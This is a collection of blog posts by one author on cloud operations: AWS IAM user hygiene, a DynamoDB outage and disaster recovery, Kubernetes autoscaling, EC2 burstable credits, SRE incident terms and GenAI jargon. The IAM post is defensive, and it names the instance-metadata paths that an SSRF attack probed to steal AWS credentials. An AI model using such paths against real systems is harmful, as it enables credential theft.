PR-time dependency CVE gate (pnpm audit + per-stack equivalents above) with documented expiry-forced allowlist.
Logger redaction at framework level for auth headers, cookies, password / token / secret keys.
CODEOWNERS covering every file in this list.

Using IAM Users in 2026 Is a Life Choice

Ahmad Kanj — Mon, 29 Dec 2025 10:43:51 +0000

Cloud incidents don’t start with breaches.

They start with archaeology.

You open the IAM console.

You scroll.

And there it is:

legacy-service-migration

Access keys: active
Console access: Enabled
Last rotation: never
Owner: unknown

No one remembers why it exists.

No one knows what breaks if you delete it.

So it stays.

This isn’t negligence.

It’s a trophic cascade.

🐺 Apex Trigger: “We’ll Just Create an IAM User”

Every cascade begins with a reasonable decision:

“We need access for a script”
“CI needs credentials”
“It’s temporary”
“We’ll clean it up later”

An IAM user is created.

Access keys are generated.

The system moves on.

Nothing breaks.

Nothing alerts.

That’s how invasive species enter ecosystems.

🐗 Primary Impact: Long-Lived Identity Enters the System

IAM users don’t expire.

They outlive:

Scripts
CI pipelines
Teams
Architectural decisions

Fast-forward a few years.

The script is gone.
The migration is done.

The pipeline changed.

The team rotated.

The IAM user remains.

Now you have:

Credentials with unclear ownership
Permissions added “just in case”
No confidence about blast radius

This is identity hygiene debt.

🌿 Secondary Cascade: Hygiene Decay Becomes Normalized

Eventually, IAM users stop feeling temporary.

You start hearing:

“Don’t touch that one”
“It’s probably used somewhere”
“We’ll audit later”
“It’s been there forever”

At this stage, security stops being declarative and becomes historical.

“We don’t know why this exists, but it must.”

Unknown identity is worse than no identity.

🌊 Ecosystem Shock: A Real Incident (AWS IMDS)

This fragility is exactly why real-world incidents hurt.

In 2025, An active exploitation attempts tied to CVE-2025-51591 an SSRF vulnerability in the Pandoc document converter.

Attackers submitted crafted HTML designed to force servers to make internal requests — specifically targeting AWS Instance Metadata Service (IMDS) at:

Why IMDS?

Because it can return AWS credentials.

Wiz observed attackers probing metadata paths like:

/latest/meta-data/iam/info
/latest/meta-data/iam/security-credentials

In many environments, the attack failed thanks to IMDSv2, which requires session tokens and blocks blind SSRF.

But here’s the uncomfortable question:

What if those workloads relied on static IAM user keys instead of roles?

That’s where the cascade completes.

🧨 When IAM User Hygiene Is Bad, Incidents Become Permanent

There’s a critical difference:

If a role is compromised

Credentials expire
Sessions die
Access collapses naturally

If an IAM user key is compromised

Credentials persist
Attackers can return later
Rotation is manual (and often forgotten)

An SSRF is just an entry point.

IAM user hygiene determines the blast radius and lifespan.

🧹 What I Actually Found During an Audit

During a routine IAM review, I found:

IAM users created in 2016–2018
Active access keys
Broad permissions (S3, EC2, IAM)
No recent CloudTrail activity
No documentation
No owner

Deleting them felt risky.

That’s the real failure state:

Inaction feels safer than action.

And that’s how ecosystems rot.

🛡️ The Missing Species: Ephemeral Identity

Modern AWS identity assumes:

Short-lived credentials
Clear ownership
Contextual access
Automatic expiration

That means:

IAM roles
OIDC
SSO
IMDSv2 only
Explicit controls limiting IAM user creation

IAM users should be:

Rare
Documented
Owned
Audited
Treated like radioactive material

Not defaults.

🌱 Rewilding the System

Fixing the cascade looks like this:

List all IAM users
Identify owners
Review last usage
Remove unused keys
Replace users with roles
Block new IAM users where possible
Treat unknown identity as a defect

Yes, something might break.

But something breaking is better than something silently owning your cloud.

🧠 Final Lesson: This Is a Life Choice

Using IAM users in 2026 isn’t about ignorance.

It’s a choice to accept:

Permanent credentials
Unbounded blast radius
Identity archaeology
Fragile security posture

Cloud failures aren’t sudden.

They’re ecological.

And finding IAM users from 2017 that no one understands anymore isn’t just technical debt. It’s a warning sign that the ecosystem is already collapsing.

DynamoDB Outage: Why Multi-Cloud Fails Startups (And Real DR Wins)

Ahmad Kanj — Fri, 24 Oct 2025 13:42:38 +0000

If you felt like half the internet was broken this week, you weren't wrong. 📉 A massive, 15-hour outage in Amazon's us-east-1 region took down DynamoDB and with it, a huge chunk of the web.

This wasn't just "a server went down." It was a complex, cascading failure that exposed the deep interconnectedness of cloud services. For startups and scaleups, the immediate reaction is often, "We need to be multi-cloud to prevent this!"

Hold on!

The real lesson here isn't about running from your cloud provider. It's about understanding what failed, why us-east-1 is a special kind of dangerous and how to build a realistic Disaster Recovery (DR) plan that won't bankrupt you.

The Anatomy of a Cascading Failure

This outage was a masterclass in how modern, automated systems can fail in spectacular ways. It wasn't one thing; it was a chain of dominoes.

The Trigger: A DNS Race Condition
It all started with the system that manages the DNS for DynamoDB. Think of DNS as the Internet's phonebook. This automated system had a latent race condition—a hidden bug. Two of its own processes tried to update the DynamoDB DNS record at the exact same time.
- One process (let's call it "Slow-Worker") grabbed an old plan.
- A second process ("Fast-Worker") grabbed a new plan and applied it successfully.
- "Fast-Worker" then did its cleanup, deleting the old plan that "Slow-Worker" was still holding.
- "Slow-Worker" finally woke up and applied its plan... which was now empty.
- Result: The main DNS record for dynamodb.us-east-1.amazonaws.com was wiped clean. All its IP addresses vanished.
The First Domino: DynamoDB Goes Offline
Instantly, any application (including AWS's own internal services) attempting to access DynamoDB in that region received a "does not exist" error. The service was unreachable.
The Cascade: EC2, Lambda and IAM Fall Next
This is where it gets scary. Cloud services are built on top of other cloud services. And DynamoDB is a Tier 0 service—a foundational block.
- EC2 failed because its control plane (the "brain" that launches new servers) uses DynamoDB to track the state and leases of its physical hardware. No DynamoDB, no new EC2 instances.
- Lambda, ECS, EKS and Fargate all failed because they all run on EC2. They couldn't get new computing capacity.
- Network Load Balancers started failing health checks, causing connection errors for services that were technically still running.
- IAM, which handles authentication, was also impacted. This is critical: during the outage, some engineers were unable to log in to the console to fix the problem.
The 15-Hour Recovery and "Congestive Collapse"
Engineers fixed the DNS record relatively quickly, but the outage lasted 15 hours. Why?
- DNS Caching: The "empty" (and wrong) DNS record was cached by resolvers all over the internet. They had to wait for that cache to expire.
- Congestive Collapse: When the service finally came back, a "thundering herd" of every single service retrying at once hammered DynamoDB. The system, in its weakened recovery state, was so overwhelmed by recovery work that it couldn't make forward progress. Engineers had to manually throttle traffic and drain backlogs to bring it back online safely.

The Global Blast Radius: Why You Should Never Host in `us-east-1`

"But I don't even use us-east-1!" you might say. "I'm in eu-west-3 (Paris)!"

It didn't matter. This outage had a global impact and it exposes the dirty secret of AWS: us-east-1 (N. Virginia) is not just another region.

Because it's the oldest AWS region, many "global" services have their control planes homed there by default.

Global IAM Console: The main IAM dashboard and API are, by default, in us-east-1. During the outage, users in other regions reported being unable to manage permissions or roles.
S3 Management Console: The "global" S3 console is also hosted there. You could still access your data in a bucket in Frankfurt, but you couldn't manage the bucket (e.g., change policies, create new buckets).
Global Services: Services like DynamoDB Global Tables, which replicate data worldwide, saw massive replication lag to and from the failed region.

The Multi-Cloud Fallacy: Doubling Your Problems, Not Your Uptime

When an event like this happens, the C-suite's first question is, "Why aren't we on GCP and Azure, too?"

For a startup or scaleup, "multi-cloud" is a trap. It's a strategy for massive, risk-averse banks and Fortune 100s with regulatory requirements, not for a company that needs to move fast.

Chasing multi-cloud to solve for availability is a terrible trade-off. Here’s why:

Exponential Complexity: You think AWS IAM is hard? Now try to manage AWS IAM, Google Cloud IAM and Azure Entra ID and make them all talk to each other securely. Your 3-person DevOps team is now responsible for three entirely different networking stacks, security models and deployment pipelines.
The "Lowest Common Denominator" Problem: This is the killer. The real power of AWS is in its managed services—DynamoDB, S3, Kinesis and Lambda. If you design your app to be "cloud-agnostic," you cannot use any of them. You're forced to build on basic VMs and manage your own databases (PostgreSQL on EC2) and message queues (RabbitMQ on EC2). You've just sacrificed your biggest competitive advantage (velocity) for a false sense of security.
The Talent Chasm: Finding great AWS engineers is hard enough. Finding engineers who are equally expert-level in AWS, GCP and Azure is finding a unicorn. 🦄 More likely, you'll have a team that is mediocre at all three.
The Hidden Costs: You won't save money. You'll lose all your volume discounts and you'll be hit with a constant stream of data egress fees just to keep your data in sync between clouds. This cost alone can cripple a startup.

The Right Answer: A Real DR Plan (Multi-Region, Not Multi-Cloud)

The problem this week wasn't that AWS failed. The problem was that a single region, us-east-1, failed.

The smart, resilient and cost-effective solution for a startup is not to go multi-cloud, but to go multi-region within your primary cloud.

This is where you must have an honest conversation about Cost vs. Availability. Your availability is a business decision, not just a technical one. Here are your options, from cheapest to most expensive:

1. Cold DR: Backup & Restore

How it works: You take regular backups (e.g., S3 snapshots, DynamoDB backups) and replicate them to another region using S3 Cross-Region Replication (CRR). If a disaster happens, you manually spin up a new environment from scratch in the new region and restore from the backup.
Cost: Very low. Just storage costs.
Availability (RTO/RPO): Very poor. RTO (Recovery Time Objective) is in hours or days. RPO (Recovery Point Objective) is high (e.g., "we lose the last 4 hours of data").
Use Case: Good for non-critical systems, dev/test environments.

2. Warm DR: Pilot Light (The Startup Sweet Spot 💡)

How it works: This is the best balance for most startups.
- Data: Your critical data is actively replicated to the second region. Use DynamoDB Global Tables or Aurora Global Databases.
- Infra: A minimal copy of your core infrastructure (e.g., your container images in ECR, a tiny app server, your IaC scripts) is "on" but idle in the DR region. The "pilot light" is lit.
- Failover: When a disaster hits, you "turn up the gas." You run your scripts to scale up the app servers, promote the standby database to be the new primary and use Route 53 DNS Failover to automatically redirect all traffic.
Cost: Medium. You pay for data replication and minimal idle infrastructure.
Availability (RTO/RPO): Good. RTO is in minutes. RPO is near-zero (you lose no data).

3. Hot DR: Active-Active

How it works: You run your full production stack in two or more regions simultaneously. Route 53 (or a global load balancer) splits traffic between them. If one region fails, it just takes on 100% of the traffic.
Cost: Very high. You are paying for 2x (or more) of everything.
Availability (RTO/RPO): Excellent. RTO is in seconds (or zero). RPO is zero.
Use Case: Only for your absolute, mission-critical, "company-dies-if-it's-down-for-1-minute" services.

Your Survival Checklist

Don't wait for the next outage. As a startup, you can survive this.

Move out of us-east-1 for your primary workloads. Seriously.
Define your RTO/RPO. Have the business conversation: "How long can we be down and how much data can we afford to lose?" This dictates your budget.
Implement a Pilot Light strategy for your core services.
Use native replication: Use DynamoDB Global Tables, Aurora Global DBs and S3 CRR.
Replicate your CI/CD assets: Make sure your container images (ECR) and deployment scripts are in your DR region, too. You can't recover if your recovery tools are in the fire.
Test your plan. A DR plan you've never tested is not a plan. it's a prayer.

This outage was a wake-up call. But the lesson isn't to flee AWS. It's to stop treating "the cloud" as one magic box and start treating a region as your true failure domain.

We Had Scrum Masters. Get Ready for the Vibe Code Cleanup Specialist

Ahmad Kanj — Sat, 18 Oct 2025 09:26:45 +0000

Remember when every tech company suddenly needed a Scrum Master?

They were the person with the sticky notes and the sharpies. Their job was to make sure everyone followed the rules of Agile. They ran the daily stand-ups, planned the sprints, and kept an eye on the "velocity" chart.

The goal was to help us build software better and faster. It was all about the process. The focus was always on how we were working.

Sometimes it helped. Other times, it felt like we were just having meetings about meetings.

Well, that trend cooled off. But the tech world loves a new job title, and as Gen Z floods the workforce, I think I know what's coming next. Because for Gen Z, it's all about the vibes.

Meet the "Vibe Code Cleanup Specialist" ✨

Forget about rigid processes. The new hotness is all about the feeling.

The Vibe Code Cleanup Specialist (or "Code Vibe Checker") doesn't care about your Jira tickets. Their job is to make sure the codebase just feels good. This is a role practically designed for a generation that trusts intuition and authenticity over everything else.

What would they even do?

Run "Joy Checks": They'd look at a function you wrote, turn to you, and ask with a straight face, "Does this code spark joy?" If not, you refactor it until it does.
Fix the Code's Energy: You know that part of the app that everyone hates working on? The Vibe Checker would say it has "bad energetic debt" and their job is to "cleanse" it.
Organize Folders by Feeling: They'd rearrange the project files and folders not just for logic, but for good "Feng Shui." So it just feels nice to look at.
Delete "Sad" Code: They'd find code written during a stressful project launch and gently remove it, saying it "carries a negative energy."

Basically, their main KPI is whether the codebase "passes the vibe check." Instead of daily stand-ups, they'd host "weekly code meditations" to help everyone get in sync with the project's spirit.

Is This Really So Different?

It sounds silly, right? But think about it. The Scrum Master was trying to fix the human side of coding with process. The Vibe Checker is trying to fix it with feelings.

	Scrum Master	Vibe Code Cleanup Specialist
Focus	The process of work.	The feeling of the code.
Big Question	"Are we working efficiently?"	"Are the vibes off here?"
Tools	Jira boards, velocity charts.	Good feelings, nice folder names.
Goal	Ship features on a schedule.	Have a codebase that's a joy to work in.

The Scrum Master was a very Millennial solution to a management problem: add a process, add more meetings, and track everything. The Vibe Checker is the pure Gen Z approach: if the vibes are off, nothing else matters.

So, What's My Point?

Okay, the "Vibe Code Cleanup Specialist" isn't a real job... yet.

But it's a fun way to think about how our industry is always looking for a new solution to the same old problems. Each generation brings its own language to the workplace. We went from corporate "synergy" to Agile "velocity," so it's not a huge leap to get to "vibes."

We're all just trying to find better ways to build cool things without burning out. And for a new generation of developers, the feeling might just be the most important metric there is.

What do you think? Would you want a Vibe Checker on your team? Let me know in the comments!

The Ripple Effect: How a Single Push Notification Brought Down Our Kubernetes Cluster

Ahmad Kanj — Mon, 06 Jan 2025 21:17:41 +0000

Ever notice how major system failures rarely start with major problems? That's exactly what happened to us when a simple push notification exposed the fragility of our Kubernetes infrastructure. But here's the twist: it wasn’t a bug that took us down—it was our own success.

The Calm Before the Storm

On January 28, 1986, a tiny rubber O-ring failed, leading to the devastating Challenger disaster. As a Kubernetes architect, this historical parallel haunts me daily. Why? Because in complex systems, there's no such thing as a "minor" decision. Every configuration choice ripples through your system like a stone dropped in a still pond. And just like that O-ring, our "small" product decision was about to create waves we never saw coming.

The Incident That Changed Everything

It started innocently enough. Our feature team had just rolled out a fancy new notification system, the kind of update that makes product managers smile and engineers sleep soundly, or so we thought.

At exactly 4:00 PM, our new system did exactly what it was designed to do: send a push notification to our entire user base. What we hadn't considered was human psychology. When thousands of users receive the same notification simultaneously, guess what they do? They act simultaneously.

Within seconds, our metrics painted a picture of digital chaos:

Traffic exploded by 12x requests per minute on some services
Our normal 110ms latency skyrocketed to 20 seconds
Nodes CPU utilization surged from 45% to 95%
Nodes Memory pressure jumped from 50% to 87%
Pods being killed or restarting
Pod scheduling failures cascaded throughout the cluster, with pods being evicted faster than we could stabilize them

Our monitoring dashboards transformed into a sea of red. This wasn't just a scaling issue, it was a cascade of past decisions coming back to haunt us.

The Technical Evolution

Phase 1: Infrastructure Analysis

Our initial platform setup revealed sobering limitations that would need to be addressed. Node provisioning was taking 4-6 minutes – an eternity in a crisis. Scale-up decision lag stretched to 2-3 minutes, while resource utilization languished at 35-40%. Average pod scheduling time crawled at 1.2 seconds. These numbers told a clear story: we needed a complete redesign.

We set aggressive targets that would push our infrastructure to new levels:

Rapid scaling capability: 0-800% in 3 minutes
Resource efficiency: 75%+ utilization
Cost optimization: 40% reduction
Reliability: 99.99% availability

Phase 2: Control Plane Architecture

The redesign of our EKS control plane architecture became the foundation of our recovery. We implemented a robust Multi-AZ Configuration, spreading our control plane across three Availability Zones with dedicated node groups for each workload type. Our custom node labeling strategy for workload affinity proved crucial, driving our availability from 99.95% to 99.99%.

Our network design saw equally dramatic improvements. We established a dedicated VPC for cluster operations, implemented private API endpoints, and fine-tuned our CNI settings for improved pod density. The impact was immediate: pod networking latency dropped by 45%.

Security wasn't forgotten either. We implemented a zero-trust security model, comprehensive pod security policies, and network policies for namespace isolation. The result? Zero security incidents since implementation.

Phase 3: The Great Node Flood

Then came what we now call "The Great Node Flood" our first major test. The initial symptoms were severe: pod scheduling delays averaged 5 seconds, node boot times stretched to 240-360 seconds, CNI attachment delays ran 45-60 seconds, and image pull times consumed 30-45 seconds of precious time.

Our investigation revealed multiple bottlenecks: CNI configuration issues, suboptimal route tables, and DNS resolution delays. We methodically tackled each issue, analyzing kubelet startup procedures, container runtime configurations, and node initialization scripts.

The improvements were dramatic:

Node boot time dropped from 300s to 90s
CNI setup improved from 45s to 15s
Image pulls accelerated from 45s to 10s
Pod scheduling time decreased from 5s to 0.8s

Phase 4: Karpenter Integration

Karpenter proved to be a game-changer. Our performance benchmarks told the story:

Node provisioning time plummeted from 270s to 75s
Scale-up decisions accelerated from 180s to 20s
Resource utilization jumped from 65% to 85%
Cost per node hour dropped from $0.76 to $0.52

These configurations validated our improvements: we could now scale from x2 the nodes in 3 minutes, handle 800% workload increases without degradation, and maintain pod scheduling latency under 1 second with a 99.99% success rate.

Phase 5: KEDA Implementation

KEDA's implementation transformed our scaling dynamics. Before KEDA, scale-up reactions took 3-5 minutes, scale-down reactions dragged for 10-15 minutes, and false positive scaling events plagued us at 12%. After KEDA, those numbers improved dramatically: 15-30 second scale-ups, 3-5 minute scale-downs, and just 2% false positives.

Production validation exceeded expectations. We successfully handled 800% traffic increases while maintaining sub 250ms latency during the wave. Scaling-related incidents dropped by 90%, and cost efficiency improved by 35%.

Current State and Future Directions

Today, our platform runs with newfound confidence. Last quarter's metrics tell the story of our transformation:

Average node provisioning time: 82 seconds
P95 pod scheduling latency: 0.8 seconds
Resource utilization: 82%
Platform availability: 99.995%

Looking Ahead

Remember this: in Kubernetes, as in space flight, there are no minor decisions. Every setting, limit, and policy creates its own ripple effect. Success isn't about preventing these ripples—it's about understanding and harnessing them.

Want to dive deeper? In my next post, we'll explore:

Component-level analysis that'll change how you think about system design
Performance optimization techniques we learned the hard way
Testing methodologies that catch problems before production

Have you ever experienced a similar cascade of events in your infrastructure? Share your stories in the comments below, let's learn from each other's hard lessons. 🚀

Navigating the Vocabulary of Gen AI with GIFs

Ahmad Kanj — Mon, 11 Nov 2024 19:26:23 +0000

If there’s one thing I’ve truly mastered, it’s using GIFs (and yes, GenAI too). Generative AI is everywhere now, showing up in everything from customer support to adding creative twists to memes. But all that jargon? It can be overwhelming. So here’s the plan: I’m breaking down the world of GenAI in a way that’s clear, informative, and a little bit fun, with plenty of GIFs to keep things interesting.

Whether you want to learn the basics or just want to outsmart your tech-savvy friend, stick around you’ll get a lot out of it!

🎩 Artificial Intelligence (AI): More Than Just “Smarter Than Me”

AI sounds like Hollywood robots, but it's actually software that mimics certain human abilities, like decision-making and learning from experience. Think of it as a really, really smart version of your phone's autocorrect.

🧠 Machine Learning: The Fuel of AI Magic

Machine Learning (ML) is how AIs learn to do stuff. It’s like teaching a dog new tricks, only the "dog" is a model, and instead of treats, it gets data. ML has three styles:

Supervised Learning: You show it labeled data. It’s like training with flashcards.

Unsupervised Learning: No labels, just vibes. The model figures things out solo.

Semi-supervised Learning: A mix of both, like letting your dog run free but calling it back sometimes.

🕸️ Artificial Neural Networks (ANN): The Brain of AI

Imagine neurons from the human brain but digital! In Artificial Neural Networks, each "neuron" learns how to pass info to the next, forming the brain of AI.

📚 Deep Learning: More Layers, More Power

When these networks get thick with layers, they’re called Deep Learning. Perfect for heavy-duty jobs like recognizing faces in photos or translating languages.

🤖 Large Language Models and Foundation Models: The Big Brains of AI

Foundation Models like Large Language Models (LLMs) are trained on massive amounts of data and can be tuned for specific tasks, like writing emails or understanding memes.

🔥 Transformer Models and GPT: The Buzzwords

Thanks to Transformer Models, AI can handle all words in a sentence simultaneously instead of one by one. This is what makes Generative Pretrained Transformers (GPT) the star of text generation.

🤹‍♀️ Prompt Engineering and Prompt Chaining: AI’s Command Line

Prompt Engineering is all about crafting the perfect question to get the right answer from the AI. And Prompt Chaining? It’s like breadcrumbing AI through a maze. Fun for you; stressful for the AI.

🔍 Retrieval-Augmented Generation (RAG): The Anti-Hallucination Technique

RAG is like giving the AI a fact-checking buddy. It pulls in info from databases to keep the AI from “hallucinating” nonsense answers.

🔧 Fine-Tuning and Parameters: Tweak ‘Til You Peak

Fine-tuning gets your AI model hyper-specialized. In this stage, you adjust parameters tiny dials that control how the model behaves. Think of it like tuning a car engine.

🔥 Bias and Hallucinations in AI: When Things Go Weird

Bias is when the AI model’s data has blind spots. It might lean too far left, right, or just get things plain wrong. And Hallucinations? That’s when AI decides to get creative—making up facts that sound convincing but are 100% made up.

📏 Important Metrics: Temperature, Anthropomorphism, Completion

Temperature: Controls randomness. High = wild, low = safe. Adjust for the “surprise” level.
Anthropomorphism: Giving AI human traits. Let’s not forget: it’s not human.
Completion: It’s about finishing a thought or sentence AI’s “period.”

🧩 Tokens, Embeddings, and Emergence: AI Building Blocks

Tokens: Tiny chunks of text. The smaller the chunk, the more accurate the AI.
Embeddings: Vectors (math things) that give words meaning. Helps the AI understand language.
Emergence in AI: When the model randomly learns new tricks, like a kid suddenly reciting Shakespeare.

📝 NLP and Text Classification: Generative AI in Action

Natural Language Processing (NLP) is where AI shines in understanding and generating human like text.

🔒 Responsible AI: Keeping AI on a Leash

Responsible AI ensures the models are fair, accurate, and trustworthy. Think of it as an AI ethics board, keeping things cool and accountable.

Did I forget any vocabulary? Feel free to drop it in the comments below.

Optimizing Performance: A Comprehensive Guide to Choosing the Right T-Family Instance with Metrics and Amazon Q

Ahmad Kanj — Sun, 04 Feb 2024 15:37:08 +0000

Amazon Web Services (AWS) offers a diverse range of EC2 instances tailored to meet the specific needs of different workloads. Among these, the T-family instances, including previous generation T2, and latest generation: T3, T3a and T4g instances, are unique as they belong to the burstable performance category. In this detailed technical article, we will explore the key concepts, best practices, and features associated with these instances, shedding light on their inner workings and helping you make informed decisions for your applications.

Key Concepts and Definitions for Burstable Performance Instances:

Earn CPU Credits: Burstable performance instances operate on a credit-based system. Credits are earned during periods of low CPU utilization and spent when the CPU needs to burst to higher performance levels. A t3.nano instance, for example, earns 6 credits per hour with 2 vCPUs. These credits act as a currency that allows the instance to burst beyond its baseline capacity.

CPU Credit Earn Rate: The rate at which credits are earned varies based on the instance type. It is crucial to understand this metric to estimate how quickly the instance can accumulate credits during low utilization periods. AWS provides detailed documentation on the earn rate for each instance type, aiding users in making informed decisions.

CPU Credit Accrual Limit: To prevent excessive accumulation of credits, AWS imposes a limit on the maximum number of credits an instance can accrue. This limit ensures fair usage and prevents instances from gaining an unfair advantage during burst periods. Users should be aware of this limit and plan accordingly.

Accrued CPU Credits Lifespan: CPU credits have a limited lifespan, and they expire if not used within that period. The accrual limit, therefore, becomes critical to avoid unnecessary credit wastage. By monitoring and understanding the lifespan of accrued credits, users can optimize the burstable performance of their instances.

Baseline Utilization: The baseline utilization represents the average CPU usage of an instance over time, calculated as (number of credits earned/number of vCPUs)/60 minutes. For instance, a T3.nano instance with 2 vCPUs earning 6 credits per hour results in a baseline utilization of 5%.
This metric helps users gauge the efficiency of their instances and determine if they are operating within the expected baseline.

Unlimited Mode for Burstable Performance Instances

AWS offers an "Unlimited" mode for burstable performance instances, allowing them to burst beyond their baseline capacity without the fear of credit depletion. This mode is useful for workloads with unpredictable or spiky CPU demands. When an instance operates in Unlimited mode, it incurs an additional charge for surplus credits beyond the maximum daily limit.

Knowing when to use Unlimited mode versus Fixed CPU mode is crucial. For applications with consistent and predictable workloads, Fixed CPU mode may be more cost-effective, as it avoids the additional charges associated with Unlimited mode.

Standard Mode for Burstable Performance Instances

In Standard mode, burstable performance instances operate within their baseline capacity, and users can control the burst behavior by managing the available launch credits. Launch credits are granted at the start of each instance and are spent during burst periods.

Understanding launch credit limits is essential for optimizing performance. Users should consider adjusting these limits based on the specific requirements of their workloads.

Monitoring CPU Credits

Effectively monitoring CPU credits is vital to ensure optimal performance and cost management. AWS provides CloudWatch metrics specifically designed for burstable performance instances, updated every five minutes:

CPUCreditUsage: The number of CPU credits spent during the measurement period.
CPUCreditBalance: The number of CPU credits accrued by the instance.
CPUSurplusCreditBalance: Surplus credits spent to sustain CPU utilization when CPUCreditBalance is zero.
CPUSurplusCreditsCharged: Surplus credits exceeding the maximum daily limit, incurring additional charges.

Determine CPU credit utilization for Standard instances by assessing the movement in the CPU credit balance. An increase in the CPU credit balance occurs when CPU utilization falls below the baseline, signifying that the credits spent are less than those earned in the preceding five-minute interval.

Conversely, a decrease in the CPU credit balance is observed when CPU utilization surpasses the baseline, indicating that the credits spent exceed those earned in the prior five-minute interval. Mathematically, this relationship can be expressed through the following equation:

CPUCreditBalance= prior CPUCreditBalance+[Credits earned per hour×(60/5)−CPUCreditUsage]

These metrics provide a comprehensive view of an instance's credit utilization, helping users make informed decisions about their workloads.

Instance Type Recommendations

Recommendations for Selecting Optimal Instance Types
Amazon Web Services (AWS) offers valuable tools to simplify the process of choosing the most suitable instance types for your workloads. With a diverse range of instance options available, finding the right balance between performance and cost can be challenging. AWS provides two key tools for making informed decisions based on your workload characteristics:

New Workloads: Amazon Q EC2 Instance Type Selector

For new workloads, the Amazon Q EC2 Instance Type Selector proves invaluable. This tool considers your use case, workload type, CPU manufacturer preference, and your prioritization of price and performance. By leveraging this data, it provides guidance and suggestions for Amazon EC2 instance types that align best with your specific requirements.

Navigating through the Amazon EC2 console, you can access the Amazon Q EC2 instance type selector to stay updated on the latest instance types and ensure optimal price-performance for your workloads. Whether seeking advice directly from Amazon Q or using the console, this tool streamlines the process of selecting the right instance type. To utilize the Amazon Q EC2 instance type selector:

Follow the procedure to launch an instance
Next to the Instance type, click on the Get advice link.
In the "Get advice on instance type selection from Amazon Q" window, specify your requirements by choosing options from the drop-down lists, including Use Case and Workload type. Click on Get instance type advice button.
The Amazon Q AI assistant opens with personalized suggestions for instance types based on your specified requirements.
Once you've decided on an instance type, proceed to the launch instance wizard or launch template, and select the recommended instance type.

Existing Workloads: AWS Compute Optimizer

For existing workloads, AWS Compute Optimizer steps in to provide recommendations aimed at enhancing performance, reducing costs, or achieving a balance of both. By analyzing your current instance specifications and utilization metrics, Compute Optimizer determines which Amazon EC2 instance types are most suitable for handling your existing workload. The recommendations come complete with per-hour instance pricing to aid in decision-making. For a comprehensive guide on utilizing AWS Compute Optimizer, refer to the AWS Compute Optimizer User Guide.

Conclusion

In summary, gaining a deep understanding of AWS burstable performance instances empowers users to make informed decisions about their infrastructure. Proficiency in concepts like CPU credits, baseline utilization, and the monitoring of metrics through CloudWatch is crucial. Additionally, leveraging tools such as Amazon Q for selecting the right instance type further enhances users' ability to achieve cost-effective and efficient performance in the cloud.

Sources:

Incident vs Crisis: Understanding the Critical Distinction in SRE

Ahmad Kanj — Mon, 08 Jan 2024 11:28:51 +0000

In the world of Site Reliability Engineering (SRE), telling apart an incident from a crisis matters. At first, they might seem similar, but understanding the little details between them is super important. It helps a ton in managing problems, fixing them, and making sure everything stays working smoothly. This article is all about showing the differences between incidents and crises, explaining when, how, and why it's super important to call them out in an SRE setup.

Incident: The Unplanned Disruption

An incident in SRE parlance denotes an unexpected event that disrupts normal system functionality or performance. It could range from a temporary service degradation to a complete outage. Incidents are typically delineated by their scope, impact, and urgency in remediation. They are characterized by:

Localized Impact: Incidents tend to affect a specific component, service, or subset of users rather than the entire system.
Measurable Impact: These disruptions often come with quantifiable metrics, such as increased error rates, latency spikes, or service unavailability.
Mitigable with Known Procedures: Incidents are usually managed using documented runbooks or predefined procedures that SRE teams have developed over time.

Crisis: The Pervasive Threat

Contrarily, a crisis represents an escalated and pervasive situation, surpassing the severity and scope of an incident. It transcends the boundaries of a singular system or service, posing a substantial risk to the entire infrastructure, reputation, or business continuity. Key attributes of a crisis include:

Global or Wide-Spread Impact: Crises have the potential to affect multiple systems, services, or even an entire organization, causing widespread disruptions.
Escalating Severity: They often escalate rapidly, demanding immediate attention and response due to their criticality.
Unknown or Evolving Solutions: Unlike incidents, crises may lack well-defined mitigation procedures as they might involve unforeseen scenarios or complex interdependencies.

Declaring Incidents and Crises: When, How, and Why?

The declaration of an incident or a crisis within an SRE framework is not merely semantic but holds immense operational significance. Clear and accurate identification enables efficient resource allocation, communication, and resolution. The process involves:

When to Declare:

Incident: Declare an incident when there is a deviation from normal system behavior, impacting a specific service or functionality, and it can be managed within existing procedures.
Crisis: Declare a crisis when the disruption escalates, poses a significant risk to the entire system or organization, and demands immediate, dynamic, and possibly novel solutions.

How to Declare:

Incident: Utilize predefined protocols or runbooks to declare an incident, promptly initiating the established response processes.
Crisis: Invoke higher-level escalation channels, engage cross-functional teams, and establish dedicated crisis management protocols to handle the situation.

Why It's Important:

Operational Triage: Accurate declaration aids in prioritization and resource allocation, ensuring a focused response aligned with the severity of the situation.
Clear Communication: It facilitates transparent communication both within the SRE team and with stakeholders, managing expectations and sharing pertinent information.
Learning and Improvement: Distinguishing between incidents and crises helps in post-incident analysis, fostering continuous improvement by refining response strategies.

In conclusion, the distinction between an incident and a crisis is pivotal in the SRE landscape. Recognizing and declaring them accurately empowers teams to navigate disruptions effectively, safeguarding the reliability and resilience of systems while fostering a culture of continuous improvement and adaptability.

Load Balancer, Reverse Proxy, and API Gateway: Analogies to Real Life Scenarios

Ahmad Kanj — Fri, 08 Sep 2023 12:28:28 +0000

In the fast paced of tech world it's easy to get overwhelmed by the jargon and technicalities. However, understanding some fundamental concepts can help you make informed decisions about which Cloud/Infra services to use for your needs. In this article, we'll demystify three essential AWS services Load Balancers, Reverse Proxies, and API Gateways in simple everyday terms.

Load Balancers: The Traffic Directors

Imagine you run a busy restaurant with multiple chefs in the kitchen. Sometimes, lots of customers walk in, and it can be hard to serve everyone quickly and evenly. That's where Load Balancers come in.

Load Balancers distribute incoming customer traffic among the chefs (servers or instances), ensuring that everyone gets their food without waiting too long. If one chef is busy or takes a break, the Load Balancer directs customers to other chefs to keep things moving smoothly. It's like having a friendly host or hostess who ensures everyone in your restaurant gets served efficiently, even during the busiest times.

In AWS you can choose between different types of Load Balancers, each suited for specific needs. For example, the Application Load Balancer (ALB) works well for web apps and can even send certain dishes to one chef and others to a different chef based on the type of food.

Reverse Proxies: The Mailroom Organizers

Now picture you work in a big office building with a bustling mailroom that handles packages and letters. Sometimes, you need to do extra things to keep everything organized and secure, and that's where Reverse Proxies come into play.

Reverse Proxies are like friendly receptionists in your mailroom who take care of packages and letters. They keep a copy of commonly used documents in a special room to save time. When a special package arrives, they check it for security and make sure it goes to the right department. They also handle letters and packages that need extra protection, like opening envelopes to ensure they are safe before delivering them.

In AWS you can set up a Reverse Proxy to sit in front of your servers and help organize incoming requests, keep things secure, and even help with tasks like handling encrypted data (like secret letters) to protect your valuable information.

API Gateways: The Library Guides

Now think of yourself as the librarian of a big library with tons of books and resources. You want to make it easy for people to access information while keeping everything organized and secure. That's where API Gateways come into play.

